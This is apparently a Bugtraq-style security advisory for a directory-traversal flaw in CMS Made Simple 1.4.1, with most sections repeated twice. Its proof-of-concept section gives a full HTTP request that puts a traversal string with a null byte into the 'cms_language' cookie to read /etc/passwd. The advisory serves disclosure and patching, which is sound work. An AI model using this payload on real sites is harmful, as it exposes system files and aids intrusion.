CMS Made Simple 'cms_language' Cookie Parameter Directory Traversal Vulnerability
BID:32535
Info
CMS Made Simple 'cms_language' Cookie Parameter Directory Traversal Vulnerability
| Bugtraq ID: | 32535 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 29 2008 12:00AM |
| Updated: | Dec 11 2008 05:01AM |
| Credit: | M4ck-h@cK |
| Vulnerable: |
CMS Made Simple CMS Made Simple 1.4.1 |
| Not Vulnerable: |
CMS Made Simple CMS Made Simple 1.5 |
Discussion
CMS Made Simple 'cms_language' Cookie Parameter Directory Traversal Vulnerability
CMS Made Simple is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
CMS Made Simple 1.4.1 is vulnerable; other versions may also be affected.
CMS Made Simple is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
CMS Made Simple 1.4.1 is vulnerable; other versions may also be affected.
Exploit / POC
CMS Made Simple 'cms_language' Cookie Parameter Directory Traversal Vulnerability
An attacker can exploit this issue with a browser.
The following example HTTP request is available:
GET http://www.example.com/admin/login.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.example.com
Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1
Connection: Close
Pragma: no-cache
An attacker can exploit this issue with a browser.
The following example HTTP request is available:
GET http://www.example.com/admin/login.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.example.com
Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1
Connection: Close
Pragma: no-cache
Solution / Fix
CMS Made Simple 'cms_language' Cookie Parameter Directory Traversal Vulnerability
Solution:
The vendor has addressed this issue in CMS Made Simple 1.5 and later. Contact the vendor for details on obtaining the appropriate updates.
Solution:
The vendor has addressed this issue in CMS Made Simple 1.5 and later. Contact the vendor for details on obtaining the appropriate updates.
References
CMS Made Simple 'cms_language' Cookie Parameter Directory Traversal Vulnerability
References:
References:
- CMS Made Simple 'cms_language' Cookie Parameter Directory Traversal Vulnerabilit (CMS Made Simple)
- CMS Made Simple Homepage (CMS Made Simple)